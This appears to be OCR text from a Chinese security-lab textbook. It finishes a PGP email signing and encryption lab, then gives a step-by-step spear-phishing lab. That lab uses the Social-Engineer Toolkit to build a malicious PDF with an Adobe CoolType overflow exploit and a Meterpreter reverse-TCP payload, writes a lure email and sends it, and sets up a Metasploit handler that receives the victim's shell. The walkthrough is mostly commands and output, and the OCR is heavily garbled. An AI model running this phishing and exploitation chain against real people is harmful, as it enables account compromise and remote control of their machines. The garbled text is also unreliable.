如 果 选 择 Detached Signature. PGP 会 为 原始 文件 产生 一 个 单独 的 签名 文件 ,以 . sig 结 
尾 。 也 可 以 右 击 原始 文件 ,从 快捷 菜单 中 选择 PGP Verify Signature 命令 ,PGP 程序 自动 
进行 验证 ,并 显示 出 验证 结果 ,如 图 9. 2. 16 所 示 。 

6. 利用 PGP 发 送 数字 签名 邮件 

可 以 将 文件 进行 签名 后 作为 附件 发 给 对 方 . 也 可 以 直接 对 邮件 正文 进行 签名 。 发 送 签 
名 邮件 和 发 送 普 通 邮 件 是 一 样 的 。 
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PGPshell — Enter Passphrase 


Signing key : [huangie <huangje_2000@163.com> (DSS/1024) zl 
Enter passphrase for above key: 


Hide Typing 


— [sz] 


厂 Text Output 


A925 ”数字 签名 ”对 话 框 
PGPlog DER 


[encryption tes... huangjie Qhuangjie 200081 @ — 2005-930 11:33:59 
f encryption tes... huangjie Chuanejie 200081 @ 2005-9-30 11:33:58 


图 9216 数字 签名 验证 结果 


首先 使 用 邮件 用 户 代理 完成 邮件 的 编写 ,示例 中 使 用 的 是 Foxmail, 如 图 9. 2. 17 所 示 o 


会 5f} (huangjiebupt@163. com) DER 

BFW REO SEW MAD EEO 选项 @) IAW 

| ws y ey. | > 
sgBpPpuCcTeLE2 

|, mik meea 。 保存 er Mna 


检查 检查 地 址 更改 帐 户 | 


[Fuangji ebupta163. con E 
Wie: 


digital signature test 


huangjiebupt, (iF! 


这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 如 何 对 邮件 进行 数字 签名 。 


huangjie 
huangiie 20008163, con 
2005-09-30 


图 9217 用 于 试验 的 一 封 电子 邮件 


在 工具 托盘 的 PGPtray 的 图 标 上 右 击 ,从 快捷 菜单 中 选择 Current Window Sign fit 
令 , 在 弹出 的 签名 窗口 中 填写 Passphrase, 即 可 得 到 一 封 经 过 签名 的 电子 邮件 ,如 图 9. 2. 18 
所 示 。 

当 对 方 接收 到 签名 的 电子 邮件 后 ,直接 在 工具 托盘 的 PGPtray 的 图 标 上 右 击 ,选择 


Current Window-Decrypt & Verify 命令 ,PGP 程序 经 过 验证 后 得 到 签名 者 信息 ,如 图 9. 2. 19 
所 示 。 
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会 Sift (huang jiebupt@163. com) 
OW) REO SEW BAO REO 选项 @) TAD 


ee we ex S 
E 


IRA: mangji ebupt@163. com 
»x | 


主题: digital signature test 


BEGIN PGP SIGNED MESSAGE———- 
Hash: SHA1 


huangjiebupt， 您 好 ! 


这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 如 何 对 邮件 进行 数字 签名 。 


E 


huangjie 
huangiie 20000163, com 
2005-09-30 


Version: PGPfreeware 6.5.3 for non-commercial use <http://www. pgp. con? 


1QA/AvUBQzxGLawZ*K61DTtgEQ]PBQCgq471iqFgQfTPRON11n/2gpJ8FbMAnRaK 
OAPLMFU JURTVNuIeHPZ/vpno 
=810T 

—--END PGP SIGNATURE: 


图 9218 经 过 签名 的 电子 邮件 


Text Viewer 


|"* PGP Signature Status: good 


husngiebupt » 您 好 
这 是 一 封 演示 邮件 ， 用 于 演示 利用 PGP 和 0 何 对 邮件 进行 数字 签名 。 


huangie 
huange_2000G163 com 
2006-09-30 


END PGP VERIFIED MESSAGE 一 


图 92 签名 验证 后 的 电子 邮件 


7. 利用 PGP 发 送 加 密 和 签名 邮件 

首先 使 用 邮件 用 户 代理 完成 邮件 的 编写 ,示例 中 使 用 的 是 Foxmail, 如 图 9. 2. 20 所 示 。 

在 工具 托盘 的 PGPtray 的 图 标 上 右 击 ,从 快捷 菜单 中 选择 Current Window—> Encryp 
& Sign 命令 ,在 Key Selection Dialog 中 选择 收 信 人 的 公 钥 。 也 可 以 选择 Clipboard 
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Ó 5ft (huangjie 20000163. com) DER 
| "a EQ) BAO BAO 选项 @) y- 


WEA:  [huangjie_20000163. com E 


we | 
ER: [encrypt & sien test 


huangjie 2000, SIF! 
这 是 一 封 测试 邮件 ， 用 来 测试 PGP 对 电子 邮件 的 加 密 和 签名 功能 。 
E 


huangjie 


huang jiebupt@163. com 
2005-10-08 


图 9220 用 于 试验 的 一 封 电 子 邮件 


Encrypt & Sign 命令 ,但 是 要 首先 将 需要 加 密 的 内 容 复 制 到 剪贴 板 , 加 密 完成 后 再 用 剪贴 
板 中 的 内 容 蔡 换 原 内 容 , 如 图 9. 2. 21 所 示 。 


m: PGPtray — Key Selection Dialog 


= 


Fi eoooegooe! 


Size 
2048/1024 
4096/1024 
2048/1024 
2048/1024 
2048/1024 
2059/1024 
2059/1024 
2059/1024 
2059/1024 


Drag users from this list to the Recipients list 
[Jann Canpi <acampi@nai. com> 

[z]Bi11 Blanke éwjbüpgp. con? 

[z]Chanda Groom chanda groonünai.con? 
[zihuangjie 2005 Chuangjiebupt8163. com> 
[z]huangjiebupt <huangji ebupt@163. con? 

[zijason Bobier Qasonüpgp. com> 

[zijason Bobier jbobierüprismatix. com> 

[zlJason Bobier <jbobier@privnet. com> 

[zlJason Bobier QMOSSSOSGhobbes. kzoo edu? 


Size 


Recipients 
2048/1024 


huangjie Qwuangjie 20008163. com> 


S 


Co] ee | ie | 


T^ Secure Viewer 
T^ Conventional Encryption 


图 9221 选择 密 钥 


加 密 完 成 后 ,加 上 自己 的 数字 签名 。 这 时 需要 输入 自己 私 钥 的 Passphrase, 如 图 9. 2. 22 
所 示 。 

完成 后 ,邮件 正文 会 自动 被 密 文 替换 ,如 图 9. 2. 23 所 示 。 单 击 “ 发 送 ” ,一 封 用 收 信 人 公 
钥 加 密 后 的 PGP 邮件 就 完成 了 。 

当 收 到 一 封 加 密 的 电子 邮件 后 ,可 以 用 与 前 面相 同 的 方法 解密 ,如 图 9. 2. 24 和 图 9. 2. 25 


所 示 。 但 是 ,由 于 PGP 对 中 文 的 支持 不 是 很 好 ,因此 有 时 会 出 现 乱 码 的 情况 。 
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PGPtray — Enter Passphrase PR) 


Signing key: [huangie <huangie_2000@163.com> (DSS71024] > 


Enter passphrase for above key: Iv. Hide Typing 


图 9222 数字 签名 


会 瑟 邮 件 (huangjie_20008163- com) 

邮件 电 ) Bc) EEV MAD BAO AAW IAD — E - 
2sgBEsuccmrxermzmx| > 
发 送 特快 专递 RF 草稿 附件 邮件 头 | 检查 地 址 

收 件 人 :jsaneiie_20008163 com 
»u | 


[encrypt & sich test 


BEGIN PGP MESSAGE: - 4 
Version: PGPfreeware 6.5.3 for non-commercial use <http://www. pgp. com> 


GANQR1DEvU4DNc8BskVwckQQB/4s gkBRxaLOAi PNyKI/oxPMGs TOL]rz5qSTsskT 
nzluaYGVUnXCY 7UiE7RQ57rhZL86V1 JI bNaY xWpBJ 2nSMK grZSugRdsU6JAPO2UK 
E1GMORSd2zCCHVCc1cFddnOT7TE*a8N11Xb2YVrMgpeo jXnkOqP4dY g0S3N 4anr4i 
f6o4QrZSpKFV57YqN1D3nCxXbYsYyNFvElfa2ScEvsmjl6fXlvLVtoCWUyVTIalb | 
E4cNQh96bFCsKuLacnoKOPlPpQ8SkwK6YODo*rtFVVyRNEw*DBv36LlZuTIupIlc 

FA jr96fgurdniVhqy*40hO8N JU41VDFOGN3nCOt 6Udxn] / 3NB/92Q2fEXdeHvASX 
ENBsRU2CIIv6yIc/DByDEo/nuxXDPT75ni TYRR* SpNI*di xPC JXHO8ip6 jZP1B196T 
VPZVxvNnAG4yswS8szVCi4xI*GCFc3VBOy7nvhlSxJarFuJ jEnShXvrTA2ZNncLxs IE 
gQBaC9q9xGr*3wBUNSOvI4GvOPY1METlrPO9NNLAXEnkPH5xbi83ZfQum*yKcEPRk | 
YO1GnNO9LQ2MSG5rCu/G444yhGBadjyU*Zni t+Ry3Sollr4QEMJ£Dt xDRI RK82f*o 
lhParrglJQVEexolyuj306GPJOnYcntDExP /GOtCHRceNXLvui tn] EDJ30bBVvn/ 

oc" p5pS/ycAvHkK ZXiBEP5qX JUWZut SUKSSxdvLKH1 10DoaNonNIWfEESNBacylc 
jJ6co2WkLKZhge8XOv3eDf JyecZLvv10KivTJYQvX jgNkY/0jiruS9udFuNPUL70V | 
SWFOMNdIQTNGdQOOP9Tg4 jBdpFylAyHKpk6irX918RilZQeM9EUAqtFeXqvaey jyn 
9GtSNi9plZtBtokvQBr8xSCZQinFqCuJuyXs 9YOQNLTRPi s ZQ03qW /aL8s5/Aqx64 
SHAgJn3SEKK2vOlzzztlEGEnlF9PsyBSRztQFPevE jSw4ivYZDPtIDwdp2Plt4zR 
PGi ZEpQCHpk= 

-hoyH 

—-END PGP MESSAGE-————— 


插入 


图 922B 加 密 后 的 邮件 正文 


PGPtray - Enter Pa: 


Message was encrypted to the following public key(s) : 
huangie <huangie_2000@163.com> (DH/2048) 


Enter passphrase for your private key © 


图 9224 输入 自己 私 钥 的 Paspas 
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Text Viewer 
一 PGP Signature Status: good 
E huangie <huangie_2000@163.com> 


BEGIN PGP DECRYPTED/VERIFIED MESSAGE 一 
Ihuangie 2000, 您 好 


这 是 一 封 测试 邮件 ， 用 来 测试 PGP 对 电子 邮件 的 加 密 和 签名 功能 。 


huangle 
huangiebupt@163.com 
2005-10-08 


|'"* END PGP DECRYPTED/VERIFIED MESSAGE 一 


图 922 解密 结果 


实验 报告 要 求 


。 写 明 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
. 闸 述 收获 与 体会 。 
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第 10 章 邮件 钓鱼 社会 工程 学 实验 


10.1 社会 工程 学 


社会 工程 学 是 通过 分 析 攻 击 对 象 的 心理 弱点 ` 利 用 人 类 的 本 能 反应 以 及 人 的 好 奇 、 贪 禁 
等 心理 特征 进行 的 ,诸如 使 用 假 骨 .欺骗 .引诱 等 多 种 手段 达到 攻击 目标 的 一 种 攻击 手段 。 
另外 ,社会 工程 学 攻击 蕴含 了 各 式 各 样 的 灵活 构思 和 变化 因素 。 无 论 何 时 何 地 ,在 需要 套 取 
所 需要 的 信息 或 是 操作 对 方 之 前 ,攻击 的 实施 者 都 必须 掌握 大 量 的 相关 知识 基础 、 花 费时 间 
从 事 资料 的 收集 和 整理 ,并 进行 必要 的 沟通 工作 。 


10.1.1 社会 工程 学 的 攻击 形式 


现代 社会 工程 学 攻击 通常 以 交谈 ,欺骗 .假冒 或 伪装 等 方式 开始 ,从 合法 用 户 那里 套 取 
用 户 的 敏感 信息 ,如 系统 配置 、 密 码 或 其 他 有 助 于 进一步 攻击 的 有 用 信息 ,然后 再 利用 此 类 
信息 结合 黑客 技术 实施 攻击 。 这 一 点 也 是 和 传统 技术 攻击 性 攻击 进行 系统 识别 ,漏洞 分 析 
和 利用 、 甚 至 暴力 破解 等 方式 之 间 的 最 大 区 别 。 从 这 个 层面 来 讲 , 社 会 工程 学 攻击 主要 是 对 
人 的 利用 ,有 时 甚至 是 对 人 性 优点 的 利用 ,如 利用 人 的 善意 和 同情 心 。 

在 通信 技术 、 互 联网 技术 及 社交 平台 飞速 发 展 的 今天 ,社会 工程 学 也 和 以 往 有 了 很 大 的 
不 同 。 社 会 工程 学 攻击 现在 可 以 利用 社交 网 络 进 行 信息 搜集 ,同时 隐藏 自己 的 真实 身份 。 
攻击 者 可 以 通过 浏览 个 人 空间 与 博客 分 析 微 博 内 容 、 用 即时 聊天 工具 与 目标 进行 在 线 沟通 ， 
甚至 可 以 获得 目标 的 高 度 信任 ,取得 目标 的 真实 姓名 电话、 邮箱 ,甚至 生日 家庭 成 员 的 详 
细 信 息 等 。 攻 击 者 把 搜集 到 的 信息 结合 相应 的 技术 手段 ,通过 网 络 实施 攻击 。 这 种 通过 互 
联网 进行 的 结合 社会 工程 学 技术 的 攻击 活动 大 大 降低 了 社会 工程 学 工程 师 面临 的 风险 。 

人 们 热衷 于 上 社交 网 络 ,获取 结交 陌生 朋友 的 刺激 与 惊喜 ;通过 秀一 些 个 人 活动 ,与 社 
区 朋友 增进 感情 ,然而 这 些 行为 都 给 社会 工程 攻击 者 获取 个 人 隐私 留 下 了 便利 。 


10.1.2 社会 工程 学 技术 框架 


社会 工程 学 发 展 到 现在 ,已 经 具有 了 一 些 通用 的 技术 流程 与 共性 特征 。 其 中 ,Social- 
Engineer 网 站 总 结 的 社会 工程 学 技术 框架 将 社会 工程 学 的 基本 工程 分 为 信息 搜集 .诱导 、 
脱 辞 与 心理 影响 4 个 环节 。 

信息 搜集 又 可 分 为 传统 的 信息 搜集 技术 和 非 传 统 的 信息 搜集 技术 。 其 中 ,传统 的 信息 
搜集 技术 涉及 的 信息 搜集 来 源 包括 目标 公司 和 个 人 网 站 .个 人 简历 .搜索 引擎 Whois 查询 、 
公共 服务 .社交 媒体 .公开 报告 等 。 而 非 传统 的 信息 搜集 技术 则 包括 行业 专家 可 以 提供 有 关 
一 个 领域 的 具体 情报 信息 ;在 目标 公司 的 雇员 们 经 常 出 没 的 一 些 活动 或 场所 中 ,与 他 们 进行 
寒 瞪 词 等 ;在 目标 公司 或 人 员 附 近 的 垃圾 搜寻 等 。 信 息 搜集 还 可 以 利用 Maltego TH. 
Maltego 是 一 个 高 度 自动 化 的 信息 搜集 工具 ,其 使 用 方法 也 非常 简单 ,Maltego 将 使 用 所 有 
已 知 的 变换 方式 获取 信息 ,并 生成 一 个 信息 关联 图 ,将 所 有 获得 的 信息 以 图 的 方式 呈现 出 
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来 ,非常 直观 。 

诱导 的 定义 是 ,通过 设计 一 些 表面 上 很 普通 且 无 关 的 对 话 , 精 巧 地 提取 出 有 价值 的 信 
息 。 这 种 对 话 可 能 发 生 在 目标 所 在 的 任何 地 点 ,如 饭店 、 健 身 房 .电话 中 ,以 及 网 络 聊 天 室 中 
等 。 诱 导 之 所 以 在 社会 工程 学 中 非常 有 用 ,是 因为 它 通常 是 低 风 险 的 ,而 且 难 以 被 发 现 。 即 
使 目标 警觉 到 了 恶意 企图 ,也 经 常 只 是 简单 地 忽略 对 方 的 提问 ,而 不 会 采取 进一步 的 措施 。 

所 谓 脱 辞 ,就 是 设计 一 个 虚构 的 场景 说 服 目标 泄露 信息 或 者 执行 某 个 动作 的 一 种 艺术 。 
这 与 简单 地 撒谎 有 很 大 的 差别 。 很 多 时 候 都 需要 创建 出 一 个 全 新 的 虚假 身份 ,然后 使 用 这 
一 身份 操纵 攻击 目标 。 社 会 工程 师 可 以 利用 脱 辞 假冒 成 为 从 事 某 种 职业 或 承担 某 个 角色 的 
其 他 人 ,而 他 们 实际 上 却 从 来 没有 干 过 这 样 的 工作 。 

在 实施 社会 工程 学 攻击 的 过 程 中 ,最 关键 的 步骤 是 在 设计 的 脱 辞 场景 中 对 目标 进行 心 
理 影 响 , 从 而 达成 你 所 预期 的 社会 工程 学 攻击 目标 ,也 就 是 套 取 敏感 信息 或 者 操纵 目标 进行 
特定 的 工作 。 通 过 一 些 人 性 心理 学 利用 的 准则 ,作为 工程 师 , 你 可 以 驱使 目标 按照 你 所 期 望 
的 方式 思考 动作 ,甚至 相信 你 让 他 所 做 的 这 一 切 都 是 有 利于 他 的 。 社 会 工程 师 们 每 天 都 在 
使 用 心理 操纵 的 艺术 。 


10.2 ”邮件 钓鱼 社会 工程 学 实验 


在 具体 进行 本 次 实验 之 前 ,默认 你 们 已 经 完成 了 社会 工程 学 攻击 的 前 面 的 情报 搜集 等 
更 加 偏重 于 非 计算 机 技术 部 分 的 环节 ,而 主要 介绍 之 后 如 何 利用 SET 工具 集 完成 邮件 
钓鱼 。 

社会 工程 学 工具 包 是 一 个 叫 devolution 的 项 目 , 其 随 着 BackTrack 的 发 布 被 用 作 渗 透 
测试 。 这 个 项 目的 框架 是 由 David Kennedy(CReL1lk) 完 成 的 ,可 以 访问 http://www. social- 
engineer. org 获得 更 多 关于 SET 包 的 信息 。 

在 实施 渗透 的 场景 中 ,除了 发 现 软 硬 件 的 漏洞 并 实施 攻击 外 ,最 有 效 的 方法 是 洞察 对 方 
的 思想 ,并 获得 所 有 与 之 相关 的 第 一 手 信息 ,这 个 渗透 技巧 被 叫 作 社会 工程 学 攻击 。 基 于 工 
具 和 软件 的 计算 机 系统 促成 了 称 之 为 SET 的 社会 工程 学 工具 包 的 诞生 。 


实验 器 材 
PCCWindows XP/Windows 7) ,1 f. 
预习 要 求 


(1) 社会 工程 学 的 基本 内 容 。 
(2) 社会 工程 学 的 攻击 形式 。 
(3) 社会 工程 学 的 基本 框架 知识 。 


实验 任务 
掌握 社会 工程 学 的 基本 技术 及 邮件 钓鱼 社会 工程 的 攻击 原理 。 
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实验 环境 

安装 了 Back Track 5 的 PC 一 台 。 
预备 知识 

COD 社会 工程 学 攻击 原理 。 

(2) 邮件 钓鱼 知识 。 

实验 步 又 


(1) 在 Back Track 5 中 打开 工具 集 。 

(D 打开 /pentest/exploits 文件 夹 。 

root@ bt:~ # cd /pentest/exploits/ 

© 使 用 ls 命令 查看 文件 夹 中 的 文件 信息 。 
root@ bt:/pentest/exploits# 1s-a 

设置 后 exploits 文件 夹 下 的 文件 信息 如 下 。 


drwxr-xr-x 4 root root 4096 2011- 07- 12 06:59 exploitdb 

drwxr-xr-x 7 root root 4096 2011- 08- 16 13:33 fasttrack 

lrwxrwxrwx 1 root root 19 2011- 08- 18 12:25 framework - > /apt/framework/msft3 
drwxr-xr-x 14 root root 4096 2011- 05- 10 03:41 framework? 

drwxr-xr-x 9 501 staff 4096 2011- 06- 07 14:17 isr- evilgrade 

drwxr-xr-x 10 root root 4096 2011- 05- 10 03:42 sapyto 

drwxr-xr-x 8 root root 4096 2011-08-16 18:56 set 

drwxr-xr-x 2 root root 4096 2011- 05- 10 03:42 spamhole 


© 从 上 面 的 详细 文件 信息 中 看 到 了 sec 文件 夹 ,进入 此 文件 夹 。 
root bt: /pentest/exploitst od set/ 

CD 使 用 “. /set” 命 令 打 开 SET TRE., 

root bt: /pentest /exploits/set# ./set 


设置 后 的 SET 工具 集 打开 后 的 信息 如 下 。 


ii The Social- Engineer Toolkit (SET) F= 
Ed Created by: David Kennedy (FeLIK) Fesi 
[---] Develogment Team: Thamas Werth ---] 
L--] Development Team: JR DePre (prime) ---] 
Es] Development Team: Joey Furr (jOfer) E==] 
==] Version: 2.0.3 [==] 
==] Codename: "Trebuchet Edition" E==1 
==1] Report bugs to: davek@ seamniac.om E--3 
E--1 Follow me on Twitter: dave rellk E 
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广 --] Homepage: http://www.seananiac.cam [---1 

Welcome to the Social- Engineer Toolkit (SET). Your one 
stop shop for all of your socia l- engineering needs. . 
DerbyCon 2011 Sep30- Oct02 — http: //www.derbycon.ccm. 
Join us on irc.freenode.net in channel # setoolkit 

Select frm the menu: 

1) Spear- Phishing Attack Vectors 

2) Website Attack Vectors 

3) Infectious Media Generator 

4) Create a Payload and Listener 

5) Mass Mailer Attack 

6) Arduino- Based Attack Vector 

7) SMS Spoofing Attack Vector 

8) Wireless Acoess Point Attack Vector 

9) Third Party Modules 

10) Update the Metasploit Framework 

11) Update the Social- Engineer Toolkit 

12) Help, Credits, and About 


99) Exit the Social- Engineer Toolkit 


(2) 输入 1, 选择 Spear-Phishing Attack Vectors, 即 针对 性 钓鱼 邮件 攻击 向 量 SET 会 
进一步 给 出 Spearphishing 攻击 方法 的 选项 。 


set>1 
设置 后 的 Spearphishing 攻击 方法 的 选项 如 下 。 


The Spearphishing module allows you to specially craft email messages and send 
them to a large (or small) number of people with attached fileformat malicious 
payloads. If you want to spoof your email address, be sure "Sendmail" is in- 
stalled (it is installed in BM) and change the config/set config SENIMAIL= OFF 
flag to SENDMAII= CN. 
There are two options, one is getting your feet wet and letting SET do 
everything for you (option 1), the second is to create your own FileFormat 
payload and use it in your own attack. Either way, good luck and enjoy! 

1) Perform a Mass Email Attack 

2) Create a FileFormat Payload 

3) Create a Social- Engineering Template 


(3) 再 次 输入 1, 选择 Perform a Mass Email Attack ,进行 一 次 群发 钓鱼 邮件 攻击 ,然后 
进入 关键 选项 , 即 选择 攻击 载荷 。 

set:phishing> 1 

设置 后 的 攻击 载荷 选项 如 下 。 


Select the file format exploit you want. 
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The default is the PDF enbedded EXE. 
Geeeieieeeeex PAYTOADS 关 关 关 关 关 关 关 关 关 关 
1) SET Custam Written DLL Hijacking Attack Vector (RAR, ZIP) 
2) SET Custam Written Document UNC IM SB Capture Attack 
3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow 
4) Microsoft Word RIF pFragrents Stack Buffer Overflow (MS10- 087) 
5) Adde Flash Player "Button" Remote Code Execution 
€) Adobe CoolType SING Table "uniqueName" Overflow 
7) Adde Flash Player "newfunction" Invalid Pointer Use 
8) Adcbe Collab.collectEmailInfo Buffer Overflow 
9) Adobe Collab.getloon Buffer Overflow 
10) Addbe JBIG2Decode Memory Corruption Exploit 
11) Adobe PDF Embedded EXE Social Engineering 
12) Ade util.printf() Buffer Overflow 
13) Custom EXE to VBA (sent via RAR) (RAR required) 
14) Ade U3D CLODProgressiveMeshDeclaration Array Overrun 
15) Adobe PDF Embedded EXE Social Engineering (NOJS) 
16) Foxit PDF Feader v4.1.1 Title Stack Buffer Overflow 
17) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow 


(A) 输入 6, 选择 “Adobe CoolType SING Table "uniqueName" Overflow” ,该 模块 针对 
的 是 Adobe 9. 3. 4 之 前 的 阅读 器 版 本 ,漏洞 利用 原理 是 一 个 名 为 SING 的 表 对 象 中 名 为 
uniqueName 的 参数 造成 栈 缓存 区 溢出 。 


set:payloads> 6 
设置 后 的 攻击 载荷 的 类 型 列表 如 下 。 
1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker 
2) Windows Meterpreter Reverse TCP Spawn a meterpreter shell on victim and 
send back to attacker 
3) Windows Reverse VNC DLL Spawn a VNC server on victim and send 
back to attacker 
4) Windows Reverse TCP Shell (x64) Windows X64 Comand Shell, Reverse 
TCP Inline 
5) Windows Meterpreter Reverse TCP (X64) Connect back to the attacker (Windows 
x64), Meterpreter 
6) Windows Shell Bind TCP (X64) Execute payload and create an accepting 
port on remote system 
7) Windows Meterpreter Reverse HTTPS Tunnel oumunication over HTTP using SSL and use Meterpreter 


(5) 输入 2.33€ f£ “Windows Meterpreter Reverse _ TCP”, 靶 机 就 会 生成 一 个 
Meterpreter 会 话 ,并 回 连 到 攻击 机 。 


set:payloads>2 并 按 下 回 车 键 
设置 后 的 攻击 机 开启 了 443 端口 如 下 。 


set :payloads> Port to connect back on [443]: 
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[- ] Defaulting to port 443... 
[- ] Generating fileformat exploit... 

[* ] Payload creation complete- 

[* ] All payloads get sent to the src/program junk/src/program junk/template.pdf directory 
[- ] As an added bonus, use the file- format creator in SET to create your attachment. 


Right now the attachment will be imported with filename of 'template.whatever' 
Do you want to rename the file? 
example Enter the new filename: moo.pdf 


1. Keep the filename, I don't care. 
2. Rename the file, I want to be cool. 
可 以 看 到 ,选择 2 以 后 ,会 在 攻击 机 的 443 端口 开启 一 个 监听 窗口 。 当 然 ,端口 号 也 可 
以 自行 指定 ,并 且 在 目录 src/program_junk/src/program_junk/ 下 生成 了 攻击 载荷 文件 
template. pdf。 不 过 提供 了 修改 文件 名 的 选项 ,之 所 以 有 这 个 选项 ,是 因为 方便 将 攻击 载荷 
的 文件 名 修改 为 让 目标 更 加 容易 单 击 的 文件 名 ,以 达到 攻击 的 目的 。 
(6) 所 以 在 这 里 选择 选项 2 。 
set:phishing 之 2 ,并 在 提示 符 后 输入 自己 想 要 的 文件 名 (注意 ,是 包括 后 缀 名 在 内 的 文 
件 名 ) 。 
设置 后 的 界面 显示 如 下 。 


set:phishing» New filename: your wanted.pdf 


CT) 按 回 车 键 后 更 改 攻击 文件 的 名 称 。 
设置 后 的 界面 显示 如 下 所 示 。 


[* ] Filename changed, moving on... 
Social Engineer Toolkit Mass E- Mailer 
There are two options on the mass e- mailer, the first would 
be to send an email to one individual person. The second option 


will allow you to import a list and send it to as many people as 
you want within that list. 


What do you want to do: 


1. E-Mail Attack Single Email Address 
2. E-Mail Attack Mass Mailer 
99. Return to main menu. 


(8) 确认 文件 是 否 生成 ,以 及 生成 的 文件 内 容 。 
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CD 输入 刚才 提示 的 文件 路 径 。 

root@ bt:~# od /pentest/exploits/set/src/program junk/ 
C) 使 用 1s 命令 查看 文件 是 否 存在 。 

root@ bt:/pentest/exploits/set/src/program junk 1s-1 
设置 后 的 生成 的 攻击 文件 如 下 。 


total 100 

-rw-r--r--1 rootroot 48 2016-06-01 21:23 payload.options 
-rw-r--r--1 root root 46867 2016-06-01 21:23 template.pdf 
-rw-r--r--1 root root 46867 2016-06-01 23:01 your wanted.pdf 


© 使 用 xpdf 命令 查看 生成 的 攻击 文件 内 容 。 
root@ bt:/pentest/exploits/set/src/program junk xpdf your wanted.pdf 
攻击 文件 的 内 容 如 图 10. 2. 1 所 示 。 


Xpdf: your wanted.pdf 


Hello World! 


图 1021 攻击 文件 的 内 容 


QD 可 以 看 到 文本 内 容 过 于 简单 ,目标 打开 文件 后 可 能 会 因为 觉得 没有 实际 内 容 而 过 早 
关闭 文件 ,文件 打开 的 时 间 长 短 直接 影响 攻击 的 成 败 。 因 此 ,这 里 建议 使 用 pdf 编辑 器 对 文 
件 内 容 进 行 充实 ,尽量 使 得 攻击 目标 有 很 大 的 兴趣 阅读 此 文件 ,而 不 是 过 早 关闭 而 影响 攻击 
效果 。 

(9) 回 到 攻击 页 面 ,继续 往 下 执行 。 输 入 1, 选择 E-Mail Attack Single Email Address. 
即 单独 针对 一 个 邮箱 地 址 进行 邮件 攻击 。 


set :phishing> 1 
设置 后 选择 邮件 模板 的 信息 如 下 。 


Do you want to use a predefined template or craft 
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a one time email template. 


1. Pre- Defined Template 
2. ne- Tire Use Enail Template 
(10) 下 面 就 是 要 完善 攻击 邮件 的 内 容 了 。 大 家 都 知道 一 封 邮件 包括 的 东西 有 很 多 , 包 
括 主题 内容、 目标 地 址 等 。 下 面 输入 2, 选 择 One-Time Use Email Template, 即 单独 使 用 
一 个 新 的 邮件 模板 。 


set iphishing> 2 
输入 邮件 内 容 如 下 。 


set:phishing> Subject of the email: new file 
set:phishing» Send the message as html or plain? 'h' or 'p' [p]: p 


set:phishing» Enter the body of the message, hit retum for a new line. Control+ c when finished: 
Next line of the body: Hi Zhang san 

Next line of the body: Do you want. a new life? 

Next line of the body: Welcare to join us 

Next line of the body: Best wishes! 

Next line of the body: Wang qiang 


Next line of the body: ^Cset:phishing» Send email to: *******@ 163. 00m. 


其 中 加 粗 字体 的 内 容 为 自己 输入 的 内 容 。 应 该 根据 自己 的 要 求 和 实际 需要 输入 自己 的 内 
容 。 输 入 完 邮件 内 容 之 后 , 按 Ctrl 十 C 组 合 键 退出 ,输入 目标 邮件 地 址 。 结 束 后 按 回 车 键 ， 
会 让 你 选择 邮件 服务 器 。 

选择 邮件 服务 器 列表 如 下 。 


1. Use a grail Account for your email attack. 
2. Use your own server or open relay 


(11) 输入 2, 选择 Use Your Own Server or Open Relay, 使 用 一 个 自己 的 邮件 服务 器 
或 者 开放 代理 服务 器 ,并 按 下 面 所 示 输 入 相应 信息 。 


set iphishing> 2 
攻击 模块 邮件 服务 器 的 配置 结果 如 下 。 


set:phishing> Fran address (ex: mool example.Cam) : éeeeeeeec ( qq. oom. 
set:phishing» Username for open- relay [blank]: name 
Password for opem- relay [blank]: 9: 
set:phishing» SMIP email server address (ex. smtp.youremailserveryouown.cam) : mail.qq.cam 
set:phishing> Port number for the MIP server [25]: 
set:phishing» Flag this message/s as high priority? [yes|no]: yes 
[* ] SET has finished delivering the emails 
set:phishing» Set up a listener [yes|no]: yes 
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SE 


i 1 — src/program junk/meta config for ERB directives. 
(2) 切换 到 攻击 开启 模块 。 

resource (src/program junk/meta config)» use exploit/milti/handler 
(13) 设置 PAYLOAD 选项 ,选择 reverse tcp 模块 。 
resource (src/program junk/meta config)» set PAYLOAD windows/meterpreter/reverse tcp 
设置 后 界面 中 的 显示 如 下 。 

PAYLOAD= > windows/meterpreter/reverse tcp 

(14) 设置 LHOST 选项 , 选 为 本 机 IP 地 址 。 

resource (src/program junk/meta config)» set LHOST 10.10.10.128 
设置 后 界面 中 的 显示 如 下 。 

LHOST- > 10.10.10.128 

(15) 设置 LPORT 选项 , 选 443 端口 。 

resource (src/program junk/meta config)» set IEORT 443 

设置 后 界面 中 的 显示 如 下 。 

LEORT- > 443 

(16) 设置 ENCODING 选项 , 选 为 shikata ga nai. 
resource (src/program junk/meta config)» set ENOODING shikata ga nai 
设置 后 界面 中 的 显示 如 下 。 

ENCODING-» shikata ga nai 

(17) 设置 ExitOnSession 选项 , 选 为 false, 即 不 主动 退出 。 
resource (src/program junk/meta config)» set ExitOnSession false 
设置 演示 如 下 所 示 o 

ExitOnSession- > false 

(18) 下 面 就 可 以 使 用 exploit 命令 进行 攻击 了 。 

resource (src/program junk/meta config)» exploit -j 

设置 结束 后 开始 攻击 的 信息 如 下 。 


[* ] Exploit running as background jcb. 

msf exploit (handler) > 

[* ] Started reverse handler on 10.10.10.128:433 
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[* ] Starting the payload handler ... 


至 此 ,攻击 PDF 文件 已 经 随 邮 件 发 送 到 目标 邮箱 中 ,现在 就 是 等 待 目标 邮箱 中 的 PDF 


文件 被 邮箱 主人 打开 。 


当 对 方 打开 PDF 文件 时 ,攻击 机 控制 端 就 会 收 到 回 连 的 Meterpreter 控制 会 话 , 具 体 如 


下 所 示 。 


[* ] Sending stage (100215 bytes) to 10.10.10.140 

[* ] Meterpreter session i opened (10.10.10.128:433 - > 10.10.10.140:1063) at 2016- 06- 02 08:00:15 - 0400 
(39) 下 面 对 这 个 回 连 的 控制 会 话 进行 交互 。 

(D msf exploit(handler) > sessions. 


设置 后 与 控制 会 话 端口 进行 交互 的 显示 信息 如 下 。 


Id Type Infomation Connection 


1  meterpreter x86/win32 DH- CA8822AB9589\Administrator @ DH- CA8822AB9589  10.10.10.128:433 - 10.10. 
10.140:1063 


